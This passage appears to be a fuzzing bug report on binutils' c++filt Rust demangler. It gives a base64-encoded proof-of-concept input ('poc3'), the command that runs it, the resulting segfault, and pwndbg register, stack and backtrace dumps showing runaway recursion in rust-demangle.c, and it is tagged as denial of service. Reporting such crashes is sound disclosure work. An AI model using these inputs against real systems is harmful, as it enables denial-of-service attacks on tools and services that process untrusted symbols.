07:0038│     0x7fffff7ff038 ◂— 0x59 /\* 'Y' \*/
────────────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────────────
 ► f 0   0x55555563fc9c demangle\_type+476
   f 1   0x555555640547 demangle\_path+231
   f 2   0x55555563ff33 demangle\_type+1139
   f 3   0x555555640547 demangle\_path+231
   f 4   0x55555563ff33 demangle\_type+1139
   f 5   0x555555640547 demangle\_path+231
   f 6   0x55555563ff33 demangle\_type+1139
   f 7   0x555555640547 demangle\_path+231
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
\`\`\`

\*\*poc3\*\*

\`\`\`
base64 poc
aWYgeHMoEP//X1AgL61NPD1bZRAAAAA8srKysrKysrKysrKyXFxcYXRjbyBAbiD//yDPTCBHJiZv
b21vbxByZf9/X1JZREJfJmEAgAAAEABoaWEvaRAQXFxvXA==
\`\`\`

\*\*command\*\*

\`\`\`
./c++filt < ./poc
\`\`\`

\*\*Result\*\*

\`\`\`
./c++filt < ./poc
\[1\]    2031222 segmentation fault  ./c++filt < ./poc
\`\`\`

\*\*gdb\*\*

\`\`\`
Program received signal SIGSEGV, Segmentation fault.
0x000055555563f9b3 in demangle\_path\_maybe\_open\_generics (rdm=rdm@entry=0x7fffffffe040) at ./rust-demangle.c:1075
1075        demangle\_path (rdm, 0);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x4
 RCX  0x0
 RDX  0x59
 RDI  0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f424459 /\* 'YDB\_' \*/
 RSI  0x0
 R8   0x555555665ede ◂— 0x202b2000206e7964 /\* 'dyn ' \*/
 R9   0x4
 R10  0x0
 R11  0x246
 R12  0x0
 R13  0x7fffff7ff040 ◂— 0x0
 R14  0x0
 R15  0x555555696140 (mbuffer) ◂— 0x5f424459525f /\* '\_RYDB\_' \*/
 RBP  0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f424459 /\* 'YDB\_' \*/
 RSP  0x7fffff7ff000 ◂— 0x4
 RIP  0x55555563f9b3 (demangle\_path\_maybe\_open\_generics+35) ◂— call   0x555555640460
──────────────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────────────
 ► 0x55555563f9b3 <demangle\_path\_maybe\_open\_generics+35>    call   demangle\_path                <demangle\_path>
        rdi: 0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f424459 /\* 'YDB\_' \*/
        rsi: 0x0

   0x55555563f9b8 <demangle\_path\_maybe\_open\_generics+40>    mov    eax, r12d
   0x55555563f9bb <demangle\_path\_maybe\_open\_generics+43>    pop    rbx
   0x55555563f9bc <demangle\_path\_maybe\_open\_generics+44>    pop    rbp
   0x55555563f9bd <demangle\_path\_maybe\_open\_generics+45>    pop    r12
   0x55555563f9bf <demangle\_path\_maybe\_open\_generics+47>    ret

   0x55555563f9c0 <demangle\_path\_maybe\_open\_generics+48>    mov    rdx, qword ptr \[rdi\]
   0x55555563f9c3 <demangle\_path\_maybe\_open\_generics+51>    movzx  edx, byte ptr \[rdx + rax\]
   0x55555563f9c7 <demangle\_path\_maybe\_open\_generics+55>    cmp    dl, 0x42
   0x55555563f9ca <demangle\_path\_maybe\_open\_generics+58>    je     demangle\_path\_maybe\_open\_generics+208
  <demangle\_path\_maybe\_open\_generics+208>

   0x55555563f9d0 <demangle\_path\_maybe\_open\_generics+64>    cmp    dl, 0x49
──────────────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────────────
In file: /home/aidai/fuzzing/binutils/binutils-gdb/libiberty/rust-demangle.c
   1070             PRINT (", ");
   1071           demangle\_generic\_arg (rdm);
   1072         }
   1073     }
   1074   else
 ► 1075     demangle\_path (rdm, 0);
   1076   return open;
   1077 }
   1078
   1079 static void
   1080 demangle\_dyn\_trait (struct rust\_demangler \*rdm)
──────────────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────────────
00:0000│ rsp 0x7fffff7ff000 ◂— 0x4
01:0008│     0x7fffff7ff008 —▸ 0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f424459 /\* 'YDB\_' \*/
02:0010│     0x7fffff7ff010 ◂— 0x0
03:0018│     0x7fffff7ff018 —▸ 0x55555563faad (demangle\_path\_maybe\_open\_generics+285) ◂— mov    qword ptr \[rbp + 0x20\], rbx
04:0020│     0x7fffff7ff020 ◂— 0x0
05:0028│     0x7fffff7ff028 —▸ 0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f424459 /\* 'YDB\_' \*/
06:0030│     0x7fffff7ff030 ◂— 0x0
07:0038│     0x7fffff7ff038 —▸ 0x55555563fb98 (demangle\_type+216) ◂— mov    rdx, qword ptr \[rbp + 0x20\]
────────────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────────────
 ► f 0   0x55555563f9b3 demangle\_path\_maybe\_open\_generics+35
   f 1   0x55555563faad demangle\_path\_maybe\_open\_generics+285
   f 2   0x55555563fb98 demangle\_type+216
   f 3   0x55555563fb98 demangle\_type+216
   f 4   0x555555640547 demangle\_path+231
   f 5   0x55555563f9b8 demangle\_path\_maybe\_open\_generics+40
   f 6   0x55555563faad demangle\_path\_maybe\_open\_generics+285
   f 7   0x55555563fb98 demangle\_type+216
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
\`\`\`

Tag

#dos